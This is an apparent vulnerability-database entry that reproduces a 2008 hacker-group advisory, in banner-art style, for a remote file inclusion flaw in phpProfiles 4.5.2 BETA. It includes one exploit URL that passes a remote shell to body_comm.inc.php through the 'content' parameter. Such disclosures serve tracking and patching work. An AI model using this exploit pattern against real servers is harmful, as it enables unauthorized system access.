phpProfiles 4.5.2 BETA (body_comm.inc.php) RFI Vulnerability

2008-02-25T00:00:00
ID SSV:8165
Type seebug
Reporter Root
Modified 2008-02-25T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ┌┌───────────────────────────────────────────────────────────────────────────┐
││                             C r a C k E r                                ┌┘
┌┘          T H E   C R A C K   O F   E T E R N A L   M I G H T             ││
└───────────────────────────────────────────────────────────────────────────┘┘

 ┌────      From The Ashes and Dust Rises An Unimaginable crack....      ────┐
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                         [ Remote File Include ]                          ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
:   Author   : CraCkEr                : :                                    :
│   Group    : PitBull Crew           │ │                                    │
│   Script   : phpProfiles 4.5.2 BETA │ │         Register Globals :         │
│   Download : SourceForge.net        │ │                                    │
│   Method   : GET                    │ │          [█] ON   [ ] OFF          │
│   Critical : High [░░▒▒▓▓██]        │ │                                    │
│   Impact   : System access          │ │                                    │
│ ────────────────────────────────────┘ └─────────────────────────────────── │
│                              DALnet #crackers                             ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
:                                                                            :
│  Release Notes:                                                            │
│  ═════════════                                                             │
│  Typically used for remotely exploitable vulnerabilities that can lead to  │
│  system compromise.                                                        │
│                                                                            │

┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                             Exploit URL's                                ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
  ─═══════════════════════════════════════════════════════════════════════─
 http://localhost/path/Full_Release/include/body_comm.inc.php?content=[SHELL]    
   
└────────────────────────────────────────────────────────────────────────────┘
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, S|AyER, Ehab, Tfaces, Guzman, adal,
       Karlousha, Od3d99aa. Mark, Ramzi, Lust, DeaD, xD

┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                              ę CraCkEr 2008                              ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘